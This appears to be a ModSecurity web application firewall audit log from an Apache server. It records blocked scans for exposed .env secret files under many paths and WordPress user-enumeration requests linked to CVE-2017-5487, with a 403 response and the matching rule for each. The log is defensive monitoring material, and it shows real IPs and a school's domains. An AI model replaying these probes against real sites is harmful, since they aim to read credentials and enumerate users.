ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a485a923-Z-- --a3c28f26-A-- [08/Jun/2025:02:02:27 +0700] aESMw5ANhDjQAvBdMyEMHQAAAI4 103.236.140.4 44700 103.236.140.4 8181 --a3c28f26-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.211 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --a3c28f26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3c28f26-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749322947985914 765 (- - -) Stopwatch2: 1749322947985914 765; combined=311, p1=269, p2=0, p3=0, p4=0, p5=41, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3c28f26-Z-- --5fc35308-A-- [08/Jun/2025:02:02:32 +0700] aESMyGCOO9DrcKL2J_4y9QAAANQ 103.236.140.4 44702 103.236.140.4 8181 --5fc35308-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.211 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --5fc35308-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5fc35308-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749322952994666 765 (- - -) Stopwatch2: 1749322952994666 765; combined=301, p1=263, p2=0, p3=0, p4=0, p5=37, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5fc35308-Z-- --cee3302f-A-- [08/Jun/2025:02:20:31 +0700] aESQ__ClubEPOra_8UlBlgAAABY 103.236.140.4 44910 103.236.140.4 8181 --cee3302f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.196 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --cee3302f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cee3302f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749324031660093 2171 (- - -) Stopwatch2: 1749324031660093 2171; combined=1063, p1=358, p2=677, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cee3302f-Z-- --540a3321-A-- [08/Jun/2025:02:55:37 +0700] aESZOWCOO9DrcKL2J_4zhwAAAMU 103.236.140.4 45496 103.236.140.4 8181 --540a3321-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.158.93.156 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.158.93.156 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --540a3321-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --540a3321-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749326137446262 2121 (- - -) Stopwatch2: 1749326137446262 2121; combined=1000, p1=340, p2=633, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --540a3321-Z-- --59a5b60e-A-- [08/Jun/2025:03:15:28 +0700] aESd4PClubEPOra_8UlBtgAAABY 103.236.140.4 45620 103.236.140.4 8181 --59a5b60e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 196.61.45.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.61.45.244 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --59a5b60e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59a5b60e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749327328444002 3365 (- - -) Stopwatch2: 1749327328444002 3365; combined=1530, p1=509, p2=988, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59a5b60e-Z-- --0be95838-A-- [08/Jun/2025:03:25:06 +0700] aESgIvClubEPOra_8UlBtwAAAAc 103.236.140.4 45702 103.236.140.4 8181 --0be95838-B-- GET /.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --0be95838-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0be95838-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749327906811448 944 (- - -) Stopwatch2: 1749327906811448 944; combined=355, p1=304, p2=0, p3=0, p4=0, p5=51, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0be95838-Z-- --1a3a1e6b-A-- [08/Jun/2025:03:25:08 +0700] aESgJJANhDjQAvBdMyEMzwAAAIY 103.236.140.4 45704 103.236.140.4 8181 --1a3a1e6b-B-- GET /.env.save HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --1a3a1e6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a3a1e6b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749327908093406 773 (- - -) Stopwatch2: 1749327908093406 773; combined=281, p1=234, p2=0, p3=0, p4=0, p5=47, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a3a1e6b-Z-- --b2a33656-A-- [08/Jun/2025:03:25:09 +0700] aESgJWCOO9DrcKL2J_4zkgAAAME 103.236.140.4 45706 103.236.140.4 8181 --b2a33656-B-- GET /.env.prod HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --b2a33656-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2a33656-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749327909157805 835 (- - -) Stopwatch2: 1749327909157805 835; combined=300, p1=263, p2=0, p3=0, p4=0, p5=37, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2a33656-Z-- --de53164f-A-- [08/Jun/2025:03:25:09 +0700] aESgJZANhDjQAvBdMyEM0AAAAJA 103.236.140.4 45708 103.236.140.4 8181 --de53164f-B-- GET /api/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --de53164f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de53164f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749327909863750 934 (- - -) Stopwatch2: 1749327909863750 934; combined=351, p1=306, p2=0, p3=0, p4=0, p5=44, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de53164f-Z-- --5126bb3c-A-- [08/Jun/2025:03:25:10 +0700] aESgJpANhDjQAvBdMyEM0QAAAIE 103.236.140.4 45710 103.236.140.4 8181 --5126bb3c-B-- GET /dev/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --5126bb3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5126bb3c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749327910905571 670 (- - -) Stopwatch2: 1749327910905571 670; combined=264, p1=228, p2=0, p3=0, p4=0, p5=35, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5126bb3c-Z-- --484acf52-A-- [08/Jun/2025:03:25:11 +0700] aESgJ_ClubEPOra_8UlBuAAAABE 103.236.140.4 45712 103.236.140.4 8181 --484acf52-B-- GET /application/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --484acf52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --484acf52-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749327911906517 718 (- - -) Stopwatch2: 1749327911906517 718; combined=267, p1=232, p2=0, p3=0, p4=0, p5=34, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --484acf52-Z-- --4cb51f3b-A-- [08/Jun/2025:03:25:16 +0700] aESgLPClubEPOra_8UlBuQAAABc 103.236.140.4 45722 103.236.140.4 8181 --4cb51f3b-B-- GET /backend/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --4cb51f3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4cb51f3b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749327916313922 719 (- - -) Stopwatch2: 1749327916313922 719; combined=263, p1=233, p2=0, p3=0, p4=0, p5=30, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4cb51f3b-Z-- --f6a77e30-A-- [08/Jun/2025:03:25:17 +0700] aESgLZANhDjQAvBdMyEM1gAAAJI 103.236.140.4 45724 103.236.140.4 8181 --f6a77e30-B-- GET /.env.example HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --f6a77e30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6a77e30-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749327917308275 682 (- - -) Stopwatch2: 1749327917308275 682; combined=252, p1=223, p2=0, p3=0, p4=0, p5=28, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6a77e30-Z-- --345ccc43-A-- [08/Jun/2025:03:25:18 +0700] aESgLpANhDjQAvBdMyEM1wAAAJc 103.236.140.4 45726 103.236.140.4 8181 --345ccc43-B-- GET /admin/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --345ccc43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --345ccc43-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749327918012679 643 (- - -) Stopwatch2: 1749327918012679 643; combined=251, p1=217, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --345ccc43-Z-- --c5dea70d-A-- [08/Jun/2025:04:12:03 +0700] aESrI8e0OZpePEzoRnpDFgAAAEw 103.236.140.4 46048 103.236.140.4 8181 --c5dea70d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52 Accept-Charset: utf-8 --c5dea70d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5dea70d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749330723589599 776 (- - -) Stopwatch2: 1749330723589599 776; combined=276, p1=245, p2=0, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5dea70d-Z-- --77bb2167-A-- [08/Jun/2025:04:20:43 +0700] aEStK8CyjFxjzV1Pwa0llgAAAAo 103.236.140.4 46084 103.236.140.4 8181 --77bb2167-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 46.101.117.67 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 46.101.117.67 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --77bb2167-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77bb2167-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749331243181616 909 (- - -) Stopwatch2: 1749331243181616 909; combined=365, p1=323, p2=0, p3=0, p4=0, p5=42, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77bb2167-Z-- --3f0d9d05-A-- [08/Jun/2025:05:09:08 +0700] aES4hMe0OZpePEzoRnpDVgAAAE0 103.236.140.4 46574 103.236.140.4 8181 --3f0d9d05-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; BLA-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36 Accept-Charset: utf-8 --3f0d9d05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f0d9d05-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749334148866293 897 (- - -) Stopwatch2: 1749334148866293 897; combined=397, p1=354, p2=0, p3=0, p4=0, p5=43, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f0d9d05-Z-- --e613281a-A-- [08/Jun/2025:05:33:20 +0700] aES-MKD1_iznf-QmBECBXwAAAIU 103.236.140.4 47138 103.236.140.4 8181 --e613281a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 119.30.85.216 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.30.85.216 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e613281a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e613281a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749335600229442 3333 (- - -) Stopwatch2: 1749335600229442 3333; combined=1416, p1=481, p2=904, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e613281a-Z-- --dec77614-A-- [08/Jun/2025:06:45:10 +0700] aETPBqD1_iznf-QmBECCRwAAAIc 103.236.140.4 48706 103.236.140.4 8181 --dec77614-B-- GET /.env.dev HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36 Accept-Charset: utf-8 --dec77614-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dec77614-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749339910060697 928 (- - -) Stopwatch2: 1749339910060697 928; combined=436, p1=393, p2=0, 